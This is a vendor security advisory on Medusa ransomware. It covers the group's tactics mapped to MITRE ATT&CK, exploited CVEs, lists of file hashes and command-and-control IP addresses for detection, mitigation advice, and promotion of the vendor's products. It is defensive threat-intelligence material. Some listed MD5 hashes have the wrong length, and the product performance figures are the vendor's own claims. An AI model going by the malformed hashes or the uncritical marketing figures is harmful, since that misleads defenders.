1. Overview of Medusa Ransomware

First observed in 2019, the Medusa ransomware (also known as MedusaLocker) operates as a ransomware-as-a-service (RaaS) business model. It mainly targets the healthcare and educational sectors, as well as enterprises that process high volumes of personal identifiable information (PII). Medusa affiliates typically employ a double extortion tactic that steals the victim’s data before encryption. Victims are threatened with the sale or public release of their data if they do not pay the ransom. Attackers typically gain initial access through brute-force attacks on Remote Desktop Protocol (RDP), leaked RDP credentials, or spear-phishing attacks to steal user credentials.

Sangfor noted the urgent advisory issued by the Philippine Department of Information and Communications Technology (DICT), cautioning all organizations against Medusa ransomware and other prevalent attacks. For additional details, please refer to the DICT's official advisory: https://dict.gov.ph/wp-content/uploads/2023/09/DICT-Medusa-Advisory.pdf

In response to the recent surge in Medusa ransomware attacks in the Philippines, Sangfor has collected an extensive list of Indicators of Compromises (IOCs) and Tactics, Techniques, and Procedures (TTPs) related to Medusa, seen in the wild by our Neural-X Threat Intelligence platform.

Sangfor Neural-X gathers threat intelligence data from multiple external sources and correlates with anonymous data seen in the wild to obtain the latest IOC and TTP information to help you stay secure.

Disclaimer: Threat actors commonly use different TTPs, IOCs, and tools to bypass and infiltrate different network setups. They may continually adapt by using other or newer tools for greater effectiveness in executing their attacks. Thus, the IOCs and TTPs provided in this article may not fully represent all IOCs and TTPs used in Medusa ransomware attacks. We recommend subscribing to Sangfor Neural-X Threat Intelligence feeds to fully access the latest threat intelligence data and improve effectiveness in detecting and preventing other malicious activities and tools.

Contact your nearest Sangfor office to explore suitable solutions and services that best meet your needs in staying resilient against Medusa Ransomware attacks.

2. Analysis of Medusa Ransomware

2.1 Description of Medusa Ransomware

The Medusa ransomware group has escalated its activities since March 2023, increasingly targeting global enterprises. The group launched the "Medusa Blog" to leak data exfiltrated from victims who refused to pay. Information on several victims has been published on this blog, as shown in the figure below.

 Security Advisory on Medusa Ransomware 1

Our threat intelligence data reveals that Medusa commonly exploited the following vulnerabilities, among others:

  • CVE-2022-2294: Heap buffer overflow vulnerability in WebRTC
  • CVE-2022-2295: Type confusion vulnerability in Google Chrome V8
  • CVE-2022-21999: Windows Print Spooler elevation of privilege vulnerability
  • CVE-2018-13379: FortiOS path traversal vulnerability

To mitigate these vulnerabilities, it is critical to keep all software up to date, as adversaries continually adapt their TTPs to maximize the success rate of attacks.

After the ransomware encryption file is executed, a ransom note file is released. Encrypted files are appended with the ". MEDUSA" extension. The ransom note contains the attacker’s contact details in the form of a Tor browser link, payment method, and the ransom amount for decryption. The ransom note file is usually named "!! READ_ME_MEDUSA!!!. txt".

Below is a sample of a Medusa ransom note in a text file format:

Security Advisory on Medusa Ransomware 2

Below is a sample of files encrypted by Medusa ransomware:

Security Advisory on Medusa Ransomware 3

2.2 MITRE ATT&CK Mapping

Below is a list of tactics, techniques, and procedures (TTP) associated with Medusa Ransomware, mapped against the MITRE ATT&CK framework. It serves as a guideline for identifying malicious or suspicious events related to Medusa ransomware. Readers are advised to use this as a guide and not as a strict checklist to identify Medusa TTPs, which may differ between attacks.

Tactics Techniques Sub-Techniques Description/Procedures
TA0001 Initial Access


T1078 Valid Accounts 

T1078.003 Local Accounts Through brute forcing or compromised credentials of legitimate RDP accounts
T1566 Phishing T1566.001 Spear phishing Attachment Gain initial access via phishing email attachments
T1133 External Remote Services N/A Access the victim's network through an RDP service
TA0002 Execution T1059 Command and Scripting Interpreter T1059.003 Windows Command Shell Use a series of Windows commands such as bcdedit.exe and vssadmin
T1047 Windows Management Instrumentation N/A Use Windows Management Instrumentation Command line (WMIC) to delete shadow copies
TA0005 Defense Evasion T1562 Impair Defenses T1562.001 Disable or Modify Tools Terminate services or processes related to anti-virus/security tools 
T1562.009 Safe Mode Boot Abuse safe mode to evade endpoint detection
TA0006 Credential Access T1110 Brute Force T1110.002 Password Cracking Brute force the password of the local RDP account
TA0007 Discovery T1057 Processes Discovery N/A Enumerates all running processes in the current system environment
T1083 File and Directory Discovery N/A Queries the specified file, folder, and file extension
T1135 Network Share Discovery N/A Enumerate network shares
TA008 Lateral Movement T1021 Remote Services T1021.001 Remote Desktop Protocol Use RDP for lateral movement
T1021 Remote Services  T1021.002 SMB/Windows Admin Shares Lateral movement via SMB
TA0011 Command and Control T1105 Ingress Tool Transfer  N/A Use certutil to download malicious files
TA0040 Impact T1490 Inhibit System Recovery N/A Delete shadow copies and disable the Windows System Recovery feature
T1489 Service Stop N/A Terminate processes and services related to database servers, mail servers, and backups
T1486 Data Encrypted for Impact N/A Use the AES-256 algorithm to encrypt files on the computer

 

2.3 Indicators of Compromise (IOCs)

2.3.1 File Hashes

Make sure that your endpoint security solution and other security tools are configured to detect, identify, and alert you about malicious files commonly associated with Medusa ransomware. The file hashes of these files are as follows:

MD5 00A0A0A0A59C0F6579999B8B1523
MD5 08278e867322735de9e75f59b539426e
MD5 120e36c2428a4bfe9f37b977f698fa39
MD5 217b5b689dca5aa0026401bffc8d3079
MD5 3030943c7e5f2c7b710c416f7d979c25
MD5 30e71d452761fbe75d9c8648b61249c3
MD5 312e41aa5901f6e00811de343627d418
MD5 38b1cdb61aff9b5096cc971cbb3159e0
MD5 412568f078ec521bdba6ae14b9f36823
MD5 4293f5b9957dc9e61247e6e1149e4c0f
MD5 4536297338323c00783fdceabf8d36bf
MD5 47d222dd2ac5741433451c8acaac75bd
MD5 4984d9af56c39a161b627e019ed2604d
MD5 5b9ee071922cd3a060a4979a403e0f
MD5 6701070c21d3c6487c3e6291f2f0f1c9
MD5 7405efcdd3e931cde430317df1c00131
MD5 7b9dbd1a611dc4d378607e5f50b23654
MD5 7ecc2ed7db7bbb6dc794f29feb477c8c
MD5 82143033173cbeee7f559002fb8ab8c5
MD5 84b88ac81e4872ff3bf15c72f431d101
MD5 858ffbe870a7454c4a59f889d8d49169
MD5 8cd11f34d817a99e4972641caf07951e
MD5 9353a3fa46ce13ea133cfab51c8cbd7a
MD5 99a1f6e096dc79b1bc1adbefaa0cd9c5
MD5 acb0fde71fa3d57261e8eac9c3da88ab
MD5 ad182ac22ee9e8075a324fcee2038108
MD5 d02e837ecc8d57f66d6911b7286c9e71
MD5 d82b27fdcc3a63f2ab0c46c5a3caef0a
MD5 d8550fb34f73ccc47b02c51b138b11dd

 

2.3.2 Command and Control (C2) IP Addresses

Adversaries often use different IP addresses for command and control (C2) to evade detection by security controls. Below is a list of IP addresses observed by our threat intelligence initiating Medusa C2 connections.

Disclaimer: The list below does not represent an up-to-date and exhaustive list after the time of this article’s publication. Threat actors regularly update their TTPs and IP addresses to improve the effectiveness of attacks. All data shared in this document should be treated as a guideline. Apply defense-in-depth using multiple layers of cyber security controls to ensure higher threat detection and protection capability.

195.123.246.138

138.124.186.221

159.223.0.9

45.146.164.141

185.220.101.35

185.220.100.249

50.80.219.149

185.220.101.146

185.220.101.252

179.60.150.97

84.38.189.52

94.232.43.63

108.11.30.103

194.61.55.94

198.50.233.202

40.92.90.105

188.68.216.23

87.251.75.71

196.240.57.20

198.0.198.5

194.5.220.122

194.5.250.124

194.5.220.124

104.210.72.161

3. Recommendations to Prevent Medusa Ransomware

Sangfor leverages the experience of its Cyber Guardian Incident Response (IR) team in managing ransomware attacks and other cyber threats. We offer the following recommendations in relation to people, processes, and technology to keep you secure against Medusa and other ransomware variants.

Process

  1. Conduct technical security assessments, such as vulnerability assessment and penetration testing (VAPT), to identify all security loopholes and vulnerabilities. Ensure unused remote access ports such as TCP/3389 (RDP) and the ports of other remote access applications (e.g., TeamViewer, AnyDesk, and VPN) are disabled from public Internet access or restricted only to selected users and/or IP addresses.
  2. Register for Sangfor’s Ransomware Exposure Assessment service to identify commonly abused security gaps in ransomware attacks. This service uses Sangfor Endpoint Secure to automate the assessment and generate a report on your ransomware exposure level and risks. Security experts from the Cyber Guardian services team apply their experience in offense and defense to identify critical findings and prioritize remediation efforts.
  3. Only provision remote access applications (e.g., TeamViewer, AnyDesk, and VPN) that support two-factor or multi-factor authentication (i.e., 2FA or MFA). Consider the Sangfor Network Secure next-generation firewall if your current VPN does not support 2FA/MFA.
  4. Configure all admin-privileged or remote access accounts with long and strong passwords. Enhance password policy with best practices, such as passwords with a minimum of twelve (12) characters and a combination of letters, numbers, and special characters. Periodically change the password with a relatively different structure and pattern to prevent brute force attempts.
  5. Errors and alerts in security controls must be monitored at all times to detect anomalies (e.g., disabled antivirus, suspicious remote connection, malicious files or command execution) and responded to with industry best practices in a timely manner to stop any attack attempts. Consider a Managed Detection and Response (MDR) service, such as Sangfor Cyber Guardian MDR, to manage security threats on a 24x7 basis with industry best practices applied in responding to all security threats by security experts with experienced backgrounds.
  6. Ensure servers, firmware, and software are updated to the latest versions on a timely basis.
  7. Carefully manage or restrict the use of personal devices on the corporate network. This prevents threats on personal devices from spreading to the company’s IT assets or network.

Technology

1. Ensure endpoint security or antivirus (AV) software is installed and always updated with the latest virus signatures. Consider endpoint security with anti-ransomware capabilities, such as Sangfor Endpoint Secure, with features such as (but not limited to):

Security Advisory on Medusa Ransomware 4

a. Ransomware Honeypot: Uses decoy files to detect ransomware encryption to kill the encryption process in real time.

b. Micro-segmentation: Blocks ports and host access to prevent the propagation of attacks or the spread of infection.

c. Fileless protection: Stops PowerShell command execution without authorization.

d. RDP brute force attack protection: Limits, detects, and stops multiple password-guessing attempts.

e. Additionally, Sangfor Endpoint Secure could not be easily disabled by hackers to bypass and run malicious files, as shown below;

f. Perform a full organization-wide antivirus scan to ensure all malicious files noted in this investigation are identified and removed.

2. Consider the Sangfor Anti-Ransomware solution if you currently do not have technology controls capable of managing ransomware attacks in all stages of the ransomware kill chain, as shown below:

Security Advisory on Medusa Ransomware 5

3. Subscribe to Sangfor Neural-X Threat Intelligence for the latest IOCs and TTPs observed in the wild and various other party-party threat intelligence sources. Alternatively, verify any suspicious data through Sangfor’s threat intelligence webpage: https://sec.sangfor.com.cn/index/abroad?lang=EN-US

People

  1. Educate and remind staff that all remote access applications should be closed or disabled when not in use. Set an auto-logoff control to terminate any remote connections that have been inactive for over 5 minutes.
  2. Conduct periodic staff awareness training or notification on the latest social engineering techniques used by Medusa and other threat actors. Conduct assessments or simulated social engineering drills to verify the staff’s level of understanding.
  3. Hire security experts with the right offensive and defensive experience to continuously monitor and respond to threats using mature and proven response processes in accordance with the company’s risk tolerance and risk management strategies.

4. Sangfor Solutions

4.1 Sangfor Endpoint Secure

Sangfor Endpoint Secure is a comprehensive endpoint security solution designed to protect endpoint devices against malicious threats, including ransomware like Medusa. It uses a multi-layered detection and response approach that includes static and dynamic behavioral detection engines and an AI-enabled detection engine, which is trained with thousands of real attack samples seen across our customer’s environments. It achieves over 99.83% detection accuracy and has defended 12 million endpoint devices. Sangfor Endpoint Secure is also the world’s first endpoint security solution integrating a ransomware honeypot. By setting up decoy files, it instantly kills the ransomware encryption process once detected and offers One-Click Kill to remove the ransomware from all infected devices.

Security Advisory on Medusa Ransomware 6

4.2 Sangfor Network Secure

Sangfor Network Secure (formerly Sangfor NGAF) is a converged next-generation firewall effective against advanced threats like ransomware, advanced persistent threats (APTs), web application attacks, and IoT exploits. It integrates multiple security features, including intrusion prevention system (IPS), application control, cloud deception, and web application firewall (WAF), and uses AI-enabled Sangfor Engine Zero and Neural-X for detecting emerging and 0-day threats. When integrated with Sangfor Endpoint Secure, both systems exchange threat intelligence and correlate events for improved detection of stealthy behavior like C2 communication. The single dashboard offers a comprehensive threat overview and enables administrators to quickly quarantine malicious processes, making it a robust tool for early-phase ransomware mitigation.

4.3 Sangfor Cyber Command

Sangfor Cyber Command is a Network Detection and Response (NDR) platform that provides proactive defense against cyber threats like ransomware. It continuously monitors and analyzes network traffic in real time to detect threats that have breached the network. Utilizing AI-driven analytics and real-time threat intelligence feeds, it detects 95% of network anomalies, including signs of ransomware activity. Cyber Command also provides insights into vulnerabilities, such as weak passwords and uninstalled patches, enabling security teams to mitigate risks before they can be exploited. The platform integrates seamlessly with Sangfor and third-party security products to provide automated incident response. Analysts get enhanced visibility and tools for in-depth investigation, allowing for prompt remediation and bolstering overall security posture.

4.4 Sangfor Anti-Ransomware Solution

The Sangfor Anti-Ransomware Solution takes a comprehensive approach to ransomware protection by breaking every step of the "Ransomware Kill Chain," a specific sequence of events that includes infection, C2 communication, exploitation, and lateral movement. Individual security products like network firewalls and antivirus often fall short due to gaps between their spheres of influence, as demonstrated by the Medusa ransomware that infected thousands of systems across the Philippines in a matter of days. Sangfor’s solution fills these gaps, providing a more holistic and effective defense strategy against ransomware attacks.

Security Advisory on Medusa Ransomware 7

4.5 Sangfor Cyber Guardian MDR Service

The Cyber Guardian MDR service provides organizations that have limited security capabilities with essential threat detection and response services. The service uses a variety of Sangfor security technologies to continuously monitor your network to detect threats. Security experts are on duty 24x7 to analyze security alerts, rapidly respond to threats, and investigate incidents to improve your security posture.

Against the backdrop of a surge in ransomware activities, Sangfor will be introducing a new service component in the Cyber Guardian MDR service that is designed to evaluate our customers’ IT assets, identify vulnerabilities and weaknesses that are commonly exploited by ransomware, and provide necessary response actions and recommendations to prevent the possibility of a ransomware attack. This evaluation will be provided using a combination of Sangfor Endpoint Secure and other tools.

This evaluation service will be available as part of the Sangfor Cyber Guardian MDR service by the end of October 2023, so do register your interest with your local Sangfor sales representatives.

Listen To This Post

Search

Get in Touch

Get in Touch with Sangfor Team for Business Inquiry

Related Articles

What is Brain Cipher? The Ransomware that Took Down the Indonesian National Data Center

Date : 01 Jul 2024
Read Now

XZ Utils Supply Chain Compromise

Date : 15 Apr 2024
Read Now

New TellYouThePass Ransomware Variant Discovered In The Wild

Date : 25 Mar 2024
Read Now

See Other Product

Platform-X
Sangfor Access Secure
Sangfor SSL VPN
Best Darktrace Cyber Security Competitors and Alternatives in 2024
Sangfor Omni-Command
Replace your Enterprise NGAV with Sangfor Endpoint Secure